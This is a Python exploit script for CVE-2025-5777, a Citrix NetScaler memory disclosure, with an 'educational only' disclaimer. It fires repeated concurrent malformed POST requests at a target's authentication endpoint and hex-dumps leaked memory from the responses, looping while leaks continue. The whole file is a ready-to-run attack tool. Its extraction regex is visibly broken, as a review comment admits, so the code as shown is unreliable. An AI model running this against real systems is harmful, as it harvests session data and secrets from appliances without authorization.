#!/usr/bin/env python3
# Disclaimer: For authorized security research and educational use only.
"""
Title: Citrix NetScaler Memory Leak Exploit
CVE: CVE-2025-5777
Script Author: Bipin Jitiya (@win3zz)
Script Tested on: Ubuntu 20.04.6 LTS with Python 3.8.10
Writeup: https://labs.watchtowr.com/how-much-more-must-we-bleed-citrix-netscaler-memory-disclosure-citrixbleed-2-cve-2025-5777/
"""
import argparse
import asyncio
import re
import signal
import sys

import aiohttp
from colorama import init, Fore, Style

# Have colorama reset the terminal colour after every print call.
init(autoreset=True)

# Module-wide state. The first four values are read by the coroutines below;
# verbose/proxy/threads are overwritten from the command line at start-up.
stop_flag = False            # set to True to end the request loop
verbose = False              # enables the [DEBUG] prints
proxy = None                 # forwarded as-is to session.post(proxy=...)
threads = 10                 # requests per round and connector limit
leak_detected_once = False   # flipped by extract_initial_value on a hit
initial_check_done = False   # True once the first round has been judged


def signal_handler(sig, frame):
    """Handle SIGINT by asking the main loop to stop.

    Only sets ``stop_flag`` and prints a notice; the loop in ``main`` checks
    the flag at the top of each round.

    Args:
        sig: Signal number (unused).
        frame: Interrupted stack frame (unused).
    """
    global stop_flag
    stop_flag = True
    print(f"\n{Fore.YELLOW}[+] Stopping gracefully...")


def hex_dump(data):
    """Print ``data`` as rows of 16 bytes: offset, hex column, ASCII column.

    Bytes outside the printable ASCII range 32..126 are shown as ``.`` in the
    ASCII column.

    Args:
        data: A bytes-like object; iterating it must yield integers.
    """
    for offset in range(0, len(data), 16):
        row = data[offset:offset + 16]
        hex_cells = []
        text_cells = []
        for byte in row:
            hex_cells.append(f"{byte:02x}")
            text_cells.append(chr(byte) if 32 <= byte <= 126 else ".")
        hex_column = " ".join(hex_cells)
        text_column = "".join(text_cells)
        print(f"{offset:08x}: {hex_column:<48} {text_column}")


def extract_initial_value(content_bytes):
    """Search a response body for a captured value and hex-dump it.

    The body is decoded as UTF-8 (invalid sequences replaced) and searched
    with a regular expression. When the first capture group is non-blank,
    ``leak_detected_once`` is set and the captured text is hex-dumped. When it
    is blank, a debug line is printed only in verbose mode. Any exception is
    reported and swallowed.

    Args:
        content_bytes: Raw response body as bytes.
    """
    global leak_detected_once
    try:
        text = content_bytes.decode("utf-8", errors="replace")
        # NOTE(review): as written, the pattern is a single lazy group with
        # nothing around it, so it captures the empty string and the "found"
        # branch below is never taken. It looks as if delimiters around the
        # group were lost -- confirm the intended pattern with the author.
        found = re.search(r"(.*?)", text, re.DOTALL)
        has_value = found is not None and bool(found.group(1).strip())

        if has_value:
            leak_detected_once = True
            print(f"{Fore.GREEN}\n[+] Found InitialValue:")
            captured = found.group(1)
            hex_dump(captured.encode("utf-8", errors="replace"))
            return

        if verbose:
            print(f"{Fore.YELLOW}[DEBUG] No tag with value found.")
    except Exception as e:
        print(f"{Fore.RED}[!] Regex parsing error: {e}")


async def fetch(session, url):
    """Send one POST request and pass a 200 response body to the extractor.

    Connection failures and any other exception are printed and swallowed, so
    one failed request does not abort the surrounding ``asyncio.gather``.

    Args:
        session: The aiohttp client session used to send the request.
        url: Base URL without a trailing slash.
    """
    endpoint = f"{url}/p/u/doAuthentication.do"
    try:
        async with session.post(endpoint, data="login", proxy=proxy, ssl=False) as resp:
            status = resp.status
            if verbose:
                print(f"{Fore.CYAN}[DEBUG] POST to {endpoint} -> Status: {status}")

            if status != 200:
                if verbose:
                    print(f"{Fore.RED}[DEBUG] Non-200 status code received: {status}")
                return

            body = await resp.read()
            if verbose:
                print(f"{Fore.CYAN}[DEBUG] Response body (first 200 bytes): {body[:200]!r}")
            extract_initial_value(body)
    except aiohttp.ClientConnectorError as e:
        print(f"{Fore.RED}[!] Connection Error: {e}")
    except Exception as e:
        print(f"{Fore.RED}[!] Unexpected Error: {e}")


async def main(url):
    """Run rounds of concurrent requests until ``stop_flag`` is set.

    Each round starts ``threads`` calls to ``fetch`` and waits for all of
    them. After the first round only, the loop stops if no call set
    ``leak_detected_once``; otherwise rounds continue with a one-second pause
    between them.

    Args:
        url: Base URL without a trailing slash.
    """
    global stop_flag, leak_detected_once, initial_check_done

    session_options = {
        "connector": aiohttp.TCPConnector(limit=threads),
        "timeout": aiohttp.ClientTimeout(total=15),
    }
    async with aiohttp.ClientSession(**session_options) as session:
        while not stop_flag:
            await asyncio.gather(*(fetch(session, url) for _ in range(threads)))

            # The first completed round decides whether to keep going.
            if not initial_check_done:
                initial_check_done = True
                if not leak_detected_once:
                    print(
                        f"{Fore.YELLOW}[+] No leak detected in initial round. "
                        f"Target likely not vulnerable."
                    )
                    stop_flag = True
                    break
                print(f"{Fore.GREEN}[+] Leak detected! Continuing to extract...")

            await asyncio.sleep(1)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="CVE-2025-5777 Citrix NetScaler Memory Leak PoC (Educational Only)"
    )
    parser.add_argument("url", help="Base URL (e.g., http://target.com)")
    parser.add_argument(
        "-v", "--verbose", action="store_true", help="Enable debug output"
    )
    parser.add_argument(
        "-p", "--proxy", help="HTTP proxy URL (e.g., http://127.0.0.1:8080)"
    )
    parser.add_argument(
        "-t",
        "--threads",
        type=int,
        default=10,
        help="Number of concurrent threads (default: 10)",
    )
    args = parser.parse_args()

    # Publish the parsed options through the module-level names that the
    # coroutines read.
    verbose = args.verbose
    proxy = args.proxy
    threads = args.threads

    signal.signal(signal.SIGINT, signal_handler)

    try:
        asyncio.run(main(args.url.rstrip("/")))
    except KeyboardInterrupt:
        # NOTE(review): likely unreachable for Ctrl-C, since the SIGINT
        # handler installed above does not raise -- confirm before relying
        # on this message.
        print(f"\n{Fore.YELLOW}[+] Interrupted by user.")